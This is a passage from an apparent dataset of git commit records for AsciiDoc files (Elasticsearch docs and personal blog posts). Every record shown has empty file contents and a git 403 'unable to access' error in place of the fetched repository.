Elasticsearch","repos":"njlawton\/elasticsearch,mikemccand\/elasticsearch,geidies\/elasticsearch,jimczi\/elasticsearch,cwurm\/elasticsearch,umeshdangat\/elasticsearch,girirajsharma\/elasticsearch,mjason3\/elasticsearch,sreeramjayan\/elasticsearch,gmarz\/elasticsearch,pozhidaevak\/elasticsearch,diendt\/elasticsearch,vroyer\/elasticassandra,geidies\/elasticsearch,shreejay\/elasticsearch,rlugojr\/elasticsearch,andrejserafim\/elasticsearch,IanvsPoplicola\/elasticsearch,andrestc\/elasticsearch,AndreKR\/elasticsearch,iacdingping\/elasticsearch,qwerty4030\/elasticsearch,JervyShi\/elasticsearch,andrejserafim\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,rlugojr\/elasticsearch,PhaedrusTheGreek\/elasticsearch,elasticdog\/elasticsearch,geidies\/elasticsearch,liweinan0423\/elasticsearch,s1monw\/elasticsearch,obourgain\/elasticsearch,obourgain\/elasticsearch,wenpos\/elasticsearch,nilabhsagar\/elasticsearch,socialrank\/elasticsearch,jbertouch\/elasticsearch,zkidkid\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,rlugojr\/elasticsearch,avikurapati\/elasticsearch,schonfeld\/elasticsearch,girirajsharma\/elasticsearch,gmarz\/elasticsearch,nknize\/elasticsearch,wenpos\/elasticsearch,rhoml\/elasticsearch,clintongormley\/elasticsearch,ZTE-PaaS\/elasticsearch,PhaedrusTheGreek\/elasticsearch,wenpos\/elasticsearch,sreeramjayan\/elasticsearch,brandonkearby\/elasticsearch,C-Bish\/elasticsearch,nomoa\/elasticsearch,camilojd\/elasticsearch,glefloch\/elasticsearch,zkidkid\/elasticsearch,Helen-Zhao\/elasticsearch,vroyer\/elasticassandra,ricardocerq\/elasticsearch,qwerty4030\/elasticsearch,PhaedrusTheGreek\/elasticsearch,a2lin\/elasticsearch,elasticdog\/elasticsearch,yynil\/elasticsearch,jchampion\/elasticsearch,tebriel\/elasticsearch,umeshdangat\/elasticsearch,vroyer\/elassandra,StefanGor\/elasticsearch,nomoa\/elasticsearch,mapr\/elasticsearch,dpursehouse\/elasticsearch,scorpionvicky\/elasticsearch,mmaracic\/elasticsearch,sneivandt\/elasticsearch,rmuir\/elasticsearch,xuzha\/elasticsearch,uschindler\/elasticsearch,JervyShi\/elasticsearch,diendt\/elasticsearch,C-Bish\/elasticsearch,MaineC\/elasticsearch,snikch\/elasticsearch,JSCooke\/elasticsearch,ivansun1010\/elast
icsearch,schonfeld\/elasticsearch,ivansun1010\/elasticsearch,mjason3\/elasticsearch,spiegela\/elasticsearch,robin13\/elasticsearch,i-am-Nathan\/elasticsearch,spiegela\/elasticsearch,yanjunh\/elasticsearch,sneivandt\/elasticsearch,diendt\/elasticsearch,scorpionvicky\/elasticsearch,socialrank\/elasticsearch,diendt\/elasticsearch,wbowling\/elasticsearch,markwalkom\/elasticsearch,kalimatas\/elasticsearch,rhoml\/elasticsearch,andrestc\/elasticsearch,umeshdangat\/elasticsearch,awislowski\/elasticsearch,nazarewk\/elasticsearch,trangvh\/elasticsearch,PhaedrusTheGreek\/elasticsearch,Helen-Zhao\/elasticsearch,artnowo\/elasticsearch,njlawton\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,F0lha\/elasticsearch,markwalkom\/elasticsearch,socialrank\/elasticsearch,schonfeld\/elasticsearch,kaneshin\/elasticsearch,liweinan0423\/elasticsearch,kalimatas\/elasticsearch,jbertouch\/elasticsearch,ESamir\/elasticsearch,pozhidaevak\/elasticsearch,camilojd\/elasticsearch,martinstuga\/elasticsearch,F0lha\/elasticsearch,gingerwizard\/elasticsearch,zkidkid\/elasticsearch,episerver\/elasticsearch,winstonewert\/elasticsearch,clintongormley\/elasticsearch,clintongormley\/elasticsearch,rhoml\/elasticsearch,s1monw\/elasticsearch,davidvgalbraith\/elasticsearch,girirajsharma\/elasticsearch,Shepard1212\/elasticsearch,alexshadow007\/elasticsearch,mortonsykes\/elasticsearch,dongjoon-hyun\/elasticsearch,wangtuo\/elasticsearch,IanvsPoplicola\/elasticsearch,lks21c\/elasticsearch,LeoYao\/elasticsearch,cwurm\/elasticsearch,episerver\/elasticsearch,ESamir\/elasticsearch,dpursehouse\/elasticsearch,ricardocerq\/elasticsearch,fforbeck\/elasticsearch,nazarewk\/elasticsearch,glefloch\/elasticsearch,MaineC\/elasticsearch,jpountz\/elasticsearch,fernandozhu\/elasticsearch,drewr\/elasticsearch,PhaedrusTheGreek\/elasticsearch,shreejay\/elasticsearch,davidvgalbraith\/elasticsearch,gfyoung\/elasticsearch,lks21c\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,mikemccand\/elasticsearch,StefanGor\/elasticsearch,qwerty4030\/elasticsearch,wenpos\/elasticsearch,jpountz\/elasticsearch,gingerwizard\/elasticsearch,nilabhsagar\/elasticsearch,snikch\/elasticsearch,nomoa\/elasticsearch,LeoYao\/elasticsearch,brandonkearby\/elasticsearch,nilabhsagar\/elasticsearch,kalimatas\/elasticsearch,episerver\/elasticsearch,henakamaMSFT\/elasticsearch,MaineC\/elasticsearch,wuranbo\/elasticsearch,MisterAndersen\/elasticsearch,JackyMai\/elasticsearch,henakamaMSFT\/elasticsearch,markharwood\/elasticsearch,F0lha\/elasticsearch,jbertouch\/elasticsearch,sneivandt\/elasticsearch,snikch\/elasticsearch,episerver\/elasticsearch,sreeramjayan\/elasticsearch,liweinan0423\/elasticsearch,dongjoon-hyun\/elasticsearch,F0lha\/elasticsearch,JSCooke\/elasticsearch,wbowling\/elasticsearch,ricardocerq\/elasticsearch,mapr\/elasticsearch,xuzha\/elasticsearch,JackyMai\/elasticsearch,strapdata\/elassandra,andrestc\/elasticsearch,nazarewk\/elasticsearch,HonzaKral\/elasticsearch,polyfractal\/elasticsearch,markharwood\/elasticsearch,palecur\/elasticsearch,obourgain\/elasticsearch,myelin\/elasticsearch,pozhidaevak\/elasticsearch,fforbeck\/elasticsearch,polyfractal\/elasticsearch,wangtuo\/elasticsearch,JervyShi\/elasticsearch,gfyoung\/elasticsearch,henakamaMSFT\/elasticsearch,i-am-Nathan\/elasticsearch,StefanGor\/elasticsearch,IanvsPoplicola\/elasticsearch,mortonsykes\/elasticsearch,liweinan0423\/elasticsearch,LeoYao\/elasticsearch,jchampion\/elasticsearch,snikch\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,mapr\/elasticsearch,myelin\/elasticsearch,jimczi\/elastics
earch,maddin2016\/elasticsearch,Helen-Zhao\/elasticsearch,wangtuo\/elasticsearch,LeoYao\/elasticsearch,markwalkom\/elasticsearch,nezirus\/elasticsearch,jbertouch\/elasticsearch,andrejserafim\/elasticsearch,scorpionvicky\/elasticsearch,kaneshin\/elasticsearch,kalimatas\/elasticsearch,yanjunh\/elasticsearch,ZTE-PaaS\/elasticsearch,alexshadow007\/elasticsearch,myelin\/elasticsearch,qwerty4030\/elasticsearch,clintongormley\/elasticsearch,socialrank\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,markwalkom\/elasticsearch,C-Bish\/elasticsearch,gingerwizard\/elasticsearch,yynil\/elasticsearch,GlenRSmith\/elasticsearch,mmaracic\/elasticsearch,palecur\/elasticsearch,LeoYao\/elasticsearch,tebriel\/elasticsearch,AndreKR\/elasticsearch,JackyMai\/elasticsearch,geidies\/elasticsearch,avikurapati\/elasticsearch,nilabhsagar\/elasticsearch,LewayneNaidoo\/elasticsearch,rmuir\/elasticsearch,pozhidaevak\/elasticsearch,maddin2016\/elasticsearch,elasticdog\/elasticsearch,andrestc\/elasticsearch,bawse\/elasticsearch,schonfeld\/elasticsearch,ESamir\/elasticsearch,ZTE-PaaS\/elasticsearch,JackyMai\/elasticsearch,MaineC\/elasticsearch,fforbeck\/elasticsearch,awislowski\/elasticsearch,yanjunh\/elasticsearch,obourgain\/elasticsearch,camilojd\/elasticsearch,awislowski\/elasticsearch,mapr\/elasticsearch,artnowo\/elasticsearch,spiegela\/elasticsearch,scorpionvicky\/elasticsearch,ricardocerq\/elasticsearch,davidvgalbraith\/elasticsearch,strapdata\/elassandra,palecur\/elasticsearch,Stacey-Gammon\/elasticsearch,mohit\/elasticsearch,artnowo\/elasticsearch,rajanm\/elasticsearch,mikemccand\/elasticsearch,kaneshin\/elasticsearch,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,nilabhsagar\/elasticsearch,jchampion\/elasticsearch,Stacey-Gammon\/elasticsearch,rmuir\/elasticsearch,spiegela\/elasticsearch,tebriel\/elasticsearch,snikch\/elasticsearch,mmaracic\/elasticsearch,yanjunh\/elasticsearch,iacdingping\/elasticsearch,drewr\/elasticsearch,pozhidaevak\/elasticsearch,dongjoon-hyun\/elasticsearch,myelin\/elasticsearch,GlenRSmith\/elasticsearch,mmaracic\/elasticsearch,uschindler\/elasticsearch,jchampion\/elasticsearch,nknize\/elasticsearch,wuranbo\/elasticsearch,mjason3\/elasticsearch,girirajsharma\/elasticsearch,xuzha\/elasticsearch,Shepard1212\/elasticsearch,ESamir\/elasticsearch,nomoa\/elasticsearch,jpountz\/elasticsearch,mikemccand\/elasticsearch,wbowling\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,martinstuga\/elasticsearch,MisterAndersen\/elasticsearch,henakamaMSFT\/elasticsearch,iacdingping\/elasticsearch,s1monw\/elasticsearch,xuzha\/elasticsearch,umeshdangat\/elasticsearch,i-am-Nathan\/elasticsearch,liweinan0423\/elasticsearch,tebriel\/elasticsearch,naveenhooda2000\/elasticsearch,winstonewert\/elasticsearch,masaruh\/elasticsearch,ESamir\/elasticsearch,fred84\/elasticsearch,jpountz\/elasticsearch,drewr\/elasticsearch,gingerwizard\/elasticsearch,jprante\/elasticsearch,yynil\/elasticsearch,sreeramjayan\/elasticsearch,ricardocerq\/elasticsearch,bawse\/elasticsearch,yynil\/elasticsearch,coding0011\/elasticsearch,wbowling\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,xuzha\/elasticsearch,JSCooke\/elasticsearch,jprante\/elasticsearch,episerver\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,naveenhooda2000\/elasticsearch,LewayneNaidoo\/elasticsearch,MisterAndersen\/elasticsearch,mmaracic\/elasticsearch,davidvgalbraith\/elasticsearch,brandonkearby\/elasticsearch,kaneshin\/elasticsearch,wbowling\/elasticsearch,fernandozhu\/elasticsearch,AndreKR
\/elasticsearch,winstonewert\/elasticsearch,bawse\/elasticsearch,uschindler\/elasticsearch,nomoa\/elasticsearch,myelin\/elasticsearch,Helen-Zhao\/elasticsearch,geidies\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,naveenhooda2000\/elasticsearch,kaneshin\/elasticsearch,IanvsPoplicola\/elasticsearch,socialrank\/elasticsearch,i-am-Nathan\/elasticsearch,sreeramjayan\/elasticsearch,winstonewert\/elasticsearch,Shepard1212\/elasticsearch,wuranbo\/elasticsearch,Helen-Zhao\/elasticsearch,socialrank\/elasticsearch,davidvgalbraith\/elasticsearch,yynil\/elasticsearch,andrestc\/elasticsearch,elasticdog\/elasticsearch,GlenRSmith\/elasticsearch,MaineC\/elasticsearch,mjason3\/elasticsearch,dongjoon-hyun\/elasticsearch,wbowling\/elasticsearch,drewr\/elasticsearch,fred84\/elasticsearch,cwurm\/elasticsearch,cwurm\/elasticsearch,rajanm\/elasticsearch,jchampion\/elasticsearch,markwalkom\/elasticsearch,nknize\/elasticsearch,shreejay\/elasticsearch,mjason3\/elasticsearch,sreeramjayan\/elasticsearch,masaruh\/elasticsearch,nknize\/elasticsearch,fred84\/elasticsearch,elasticdog\/elasticsearch,artnowo\/elasticsearch,robin13\/elasticsearch,F0lha\/elasticsearch,mohit\/elasticsearch,trangvh\/elasticsearch,wuranbo\/elasticsearch,coding0011\/elasticsearch,palecur\/elasticsearch,a2lin\/elasticsearch,JervyShi\/elasticsearch,LewayneNaidoo\/elasticsearch,alexshadow007\/elasticsearch,jchampion\/elasticsearch,LeoYao\/elasticsearch,bawse\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LewayneNaidoo\/elasticsearch,IanvsPoplicola\/elasticsearch,artnowo\/elasticsearch,rlugojr\/elasticsearch,strapdata\/elassandra,andrestc\/elasticsearch,Stacey-Gammon\/elasticsearch,nazarewk\/elasticsearch,iacdingping\/elasticsearch,mapr\/elasticsearch,ESamir\/elasticsearch,wangtuo\/elasticsearch,gfyoung\/elasticsearch,JervyShi\/elasticsearch,rlugojr\/elasticsearch,dpursehouse\/elasticsearch,dongjoon-hyun\/elasticsearch,jpountz\/elasticsearch,nezirus\/elasticsearch,fred84\/elasticsearch,polyfractal\/elasticsearch,qwerty4030\/elasticsearch,camilojd\/elasticsearch,mortonsykes\/elasticsearch,rmuir\/elasticsearch,ivansun1010\/elasticsearch,awislowski\/elasticsearch,rhoml\/elasticsearch,fernandozhu\/elasticsearch,fernandozhu\/elasticsearch,mmaracic\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,nezirus\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,avikurapati\/elasticsearch,fernandozhu\/elasticsearch,kaneshin\/elasticsearch,andrestc\/elasticsearch,scottsom\/elasticsearch,alexshadow007\/elasticsearch,polyfractal\/elasticsearch,yanjunh\/elasticsearch,a2lin\/elasticsearch,gmarz\/elasticsearch,njlawton\/elasticsearch,girirajsharma\/elasticsearch,polyfractal\/elasticsearch,drewr\/elasticsearch,njlawton\/elasticsearch,dpursehouse\/elasticsearch,mortonsykes\/elasticsearch,obourgain\/elasticsearch,ivansun1010\/elasticsearch,avikurapati\/elasticsearch,trangvh\/elasticsearch,jprante\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,jpountz\/elasticsearch,coding0011\/elasticsearch,AndreKR\/elasticsearch,uschindler\/elasticsearch,jbertouch\/elasticsearch,strapdata\/elassandra5-rc,rhoml\/elasticsearch,StefanGor\/elasticsearch,drewr\/elasticsearch,glefloch\/elasticsearch,HonzaKral\/elasticsearch,lks21c\/elasticsearch,xuzha\/elasticsearch,mohit\/elasticsearch,s1monw\/elasticsearch,drewr\/elasticsearch,markharwood\/elasticsearch,robin13\/elasticsearch,martinstuga\/elasticsearch,jprante\/elasticsearch,F0lha\/elasticsearch,jimczi\/elasticsearch,schonfeld\/elasticsearch,glefloch\/elasticsearch,andr
ejserafim\/elasticsearch,nezirus\/elasticsearch,clintongormley\/elasticsearch,diendt\/elasticsearch,lks21c\/elasticsearch,markharwood\/elasticsearch,scottsom\/elasticsearch,ivansun1010\/elasticsearch,yynil\/elasticsearch,njlawton\/elasticsearch,nazarewk\/elasticsearch,scottsom\/elasticsearch,AndreKR\/elasticsearch,cwurm\/elasticsearch,rajanm\/elasticsearch,palecur\/elasticsearch,winstonewert\/elasticsearch,martinstuga\/elasticsearch,socialrank\/elasticsearch,diendt\/elasticsearch,mortonsykes\/elasticsearch,fred84\/elasticsearch,jbertouch\/elasticsearch,rmuir\/elasticsearch,Shepard1212\/elasticsearch,mohit\/elasticsearch,henakamaMSFT\/elasticsearch,brandonkearby\/elasticsearch,mohit\/elasticsearch,gmarz\/elasticsearch,gingerwizard\/elasticsearch,dpursehouse\/elasticsearch,martinstuga\/elasticsearch,i-am-Nathan\/elasticsearch,AndreKR\/elasticsearch,LewayneNaidoo\/elasticsearch,JSCooke\/elasticsearch,lks21c\/elasticsearch,fforbeck\/elasticsearch,sneivandt\/elasticsearch,strapdata\/elassandra5-rc,iacdingping\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,martinstuga\/elasticsearch,JervyShi\/elasticsearch,C-Bish\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,iacdingping\/elasticsearch,strapdata\/elassandra5-rc,vroyer\/elassandra,C-Bish\/elasticsearch,schonfeld\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,awislowski\/elasticsearch,uschindler\/elasticsearch,nezirus\/elasticsearch,vroyer\/elasticassandra,vroyer\/elassandra,JSCooke\/elasticsearch,scorpionvicky\/elasticsearch,avikurapati\/elasticsearch,wangtuo\/elasticsearch,schonfeld\/elasticsearch,tebriel\/elasticsearch,PhaedrusTheGreek\/elasticsearch,andrejserafim\/elasticsearch,trangvh\/elasticsearch,tebriel\/elasticsearch,strapdata\/elassandra5-rc,a2lin\/elasticsearch,rajanm\/elasticsearch,StefanGor\/elasticsearch,markharwood\/elasticsearch,davidvgalbraith\/elasticsearch,geidies\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,Shepard1212\/elasticsearch,rmuir\/elasticsearch,PhaedrusTheGreek\/elasticsearch,glefloch\/elasticsearch,gingerwizard\/elasticsearch,a2lin\/elasticsearch,naveenhooda2000\/elasticsearch,ZTE-PaaS\/elasticsearch,markharwood\/elasticsearch,masaruh\/elasticsearch,trangvh\/elasticsearch,Stacey-Gammon\/elasticsearch,masaruh\/elasticsearch,bawse\/elasticsearch,s1monw\/elasticsearch,spiegela\/elasticsearch,camilojd\/elasticsearch,kalimatas\/elasticsearch,snikch\/elasticsearch,clintongormley\/elasticsearch,brandonkearby\/elasticsearch,rhoml\/elasticsearch,MisterAndersen\/elasticsearch,masaruh\/elasticsearch,mapr\/elasticsearch,girirajsharma\/elasticsearch,andrejserafim\/elasticsearch,wbowling\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra5-rc,ZTE-PaaS\/elasticsearch,gmarz\/elasticsearch,wuranbo\/elasticsearch,ivansun1010\/elasticsearch,MisterAndersen\/elasticsearch,camilojd\/elasticsearch,alexshadow007\/elasticsearch,shreejay\/elasticsearch,iacdingping\/elasticsearch,rajanm\/elasticsearch,zkidkid\/elasticsearch,fforbeck\/elasticsearch,polyfractal\/elasticsearch,jprante\/elasticsearch,zkidkid\/elasticsearch,sneivandt\/elasticsearch,mikemccand\/elasticsearch","old_file":"docs\/plugins\/management.asciidoc","new_file":"docs\/plugins\/management.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"972cc8c302e7c7771b1920e4a16d8fce2550c14c","subject":"Update 
2012-08-19-Open-Layers-e-Google-Maps-vs-Internet-Explorer.adoc","message":"Update 2012-08-19-Open-Layers-e-Google-Maps-vs-Internet-Explorer.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2012-08-19-Open-Layers-e-Google-Maps-vs-Internet-Explorer.adoc","new_file":"_posts\/2012-08-19-Open-Layers-e-Google-Maps-vs-Internet-Explorer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"919c46d30ecfe4bf88c74781435765e7c1a76688","subject":"Update 2016-07-15-Hello.adoc","message":"Update 2016-07-15-Hello.adoc","repos":"jivank\/jivank.github.io,jivank\/jivank.github.io,jivank\/jivank.github.io,jivank\/jivank.github.io","old_file":"_posts\/2016-07-15-Hello.adoc","new_file":"_posts\/2016-07-15-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jivank\/jivank.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2092efb31b90a4d8f26cc69bd98804aa2117d38e","subject":"Update 2015-07-07-Netrunner.adoc","message":"Update 2015-07-07-Netrunner.adoc","repos":"nullbase\/nullbase.github.io,nullbase\/nullbase.github.io,nullbase\/nullbase.github.io","old_file":"_posts\/2015-07-07-Netrunner.adoc","new_file":"_posts\/2015-07-07-Netrunner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nullbase\/nullbase.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4d06e977cc3ec2ad2eae55313bbeb4e949622cf","subject":"Update 2016-06-21-Generator.adoc","message":"Update 2016-06-21-Generator.adoc","repos":"YvonneZhang\/yvonnezhang.github.io","old_file":"_posts\/2016-06-21-Generator.adoc","new_file":"_posts\/2016-06-21-Generator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YvonneZhang\/yvonnezhang.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4e45364af323196e4c7e5877ad7ccfc9a8e9f91","subject":"Update 2017-04-08-Tea-Break.adoc","message":"Update 2017-04-08-Tea-Break.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-08-Tea-Break.adoc","new_file":"_posts\/2017-04-08-Tea-Break.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8f686331d0489aa9c795537410d1d0e45a884ba","subject":"Update 2018-04-29-Hub-Press.adoc","message":"Update 2018-04-29-Hub-Press.adoc","repos":"hytgbn\/hytgbn.github.io,hytgbn\/hytgbn.github.io,hytgbn\/hytgbn.github.io,hytgbn\/hytgbn.github.io","old_file":"_posts\/2018-04-29-Hub-Press.adoc","new_file":"_posts\/2018-04-29-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hytgbn\/hytgbn.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"132f34175dc308415b56f155747e5b5e7490999f","subject":"Create README.adoc for router","message":"Create README.adoc for router","repos":"twister2016\/twister,twister2016\/twister,twister2016\/twister,twister2016\/twister","old_file":"examples\/example_gateway\/REAME.adoc","new_file":"examples\/example_gateway\/REAME.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/twister2016\/twister.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72249aa68edfd894327652af91234a38da58ec98","subject":"Update 2018-11-29-Declarer-une-Exception-Handler-dans-Spring-Boot.adoc","message":"Update 2018-11-29-Declarer-une-Exception-Handler-dans-Spring-Boot.adoc","repos":"sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io","old_file":"_posts\/2018-11-29-Declarer-une-Exception-Handler-dans-Spring-Boot.adoc","new_file":"_posts\/2018-11-29-Declarer-une-Exception-Handler-dans-Spring-Boot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sfoubert\/sfoubert.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35e981837a8942b74a7d64c51c5b54168e1a138c","subject":"#435 DSL Build Git commit","message":"#435 DSL Build Git commit\n","repos":"flesire\/ontrack,nemerosa\/ontrack,flesire\/ontrack,flesire\/ontrack,nemerosa\/ontrack,nemerosa\/ontrack,nemerosa\/ontrack,flesire\/ontrack,nemerosa\/ontrack,flesire\/ontrack","old_file":"ontrack-dsl\/src\/main\/resources\/net.nemerosa.ontrack.dsl.properties.BuildProperties\/gitCommit.adoc","new_file":"ontrack-dsl\/src\/main\/resources\/net.nemerosa.ontrack.dsl.properties.BuildProperties\/gitCommit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flesire\/ontrack.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96ee0ddf28cc5624c600ba8d520a16c11bb60926","subject":"Update 2015-11-10-Blog-Title.adoc","message":"Update 2015-11-10-Blog-Title.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"_posts\/2015-11-10-Blog-Title.adoc","new_file":"_posts\/2015-11-10-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad7cee09360b93dbac1e4723b0a38c212dccedaa","subject":"Update 2016-10-24-Stopping-Vertx-Blocked-Thread-Checker-exceptions-during-interactive-debugging.adoc","message":"Update 2016-10-24-Stopping-Vertx-Blocked-Thread-Checker-exceptions-during-interactive-debugging.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2016-10-24-Stopping-Vertx-Blocked-Thread-Checker-exceptions-during-interactive-debugging.adoc","new_file":"_posts\/2016-10-24-Stopping-Vertx-Blocked-Thread-Checker-exceptions-during-interactive-debugging.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"8c89ba081e530608a604e406ca1d9c5ede4a9754","subject":"Update 2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","message":"Update 2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","new_file":"_posts\/2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7466fe64ef7f222342a313dca28847529c7ee6e","subject":"Update 2016-02-19-Java-Memory-Pic-and-Flags.adoc","message":"Update 2016-02-19-Java-Memory-Pic-and-Flags.adoc","repos":"azubkov\/azubkov.github.io,azubkov\/azubkov.github.io,azubkov\/azubkov.github.io","old_file":"_posts\/2016-02-19-Java-Memory-Pic-and-Flags.adoc","new_file":"_posts\/2016-02-19-Java-Memory-Pic-and-Flags.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/azubkov\/azubkov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ebc8e3b6d764b7febf8e8ba40eba0c82ae4b002","subject":"Add ClojuTRE 2019","message":"Add ClojuTRE 2019\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2019\/clojutre.adoc","new_file":"content\/events\/2019\/clojutre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"86e821acb1c7537fc476ed4b4ee67db75569a8d7","subject":"add event","message":"add event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2020\/clojured.adoc","new_file":"content\/events\/2020\/clojured.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8639429d5751cfc00519332beed497c0ab096179","subject":"Renamed '_posts\/2016-10-17-Side-effects-and-how-to-deal-with-them-the-cool-way-Part-1-Pure-functions-and-functors.adoc' to '_posts\/2016-17-10-Side-effects-and-how-to-deal-with-them-the-cool-way-Part-1-Pure-functions-and-functors.adoc'","message":"Renamed '_posts\/2016-10-17-Side-effects-and-how-to-deal-with-them-the-cool-way-Part-1-Pure-functions-and-functors.adoc' to '_posts\/2016-17-10-Side-effects-and-how-to-deal-with-them-the-cool-way-Part-1-Pure-functions-and-functors.adoc'","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-17-10-Side-effects-and-how-to-deal-with-them-the-cool-way-Part-1-Pure-functions-and-functors.adoc","new_file":"_posts\/2016-17-10-Side-effects-and-how-to-deal-with-them-the-cool-way-Part-1-Pure-functions-and-functors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38004b4cfe7bbf227488a5e813c9c9f277c6c6f2","subject":"add event","message":"add 
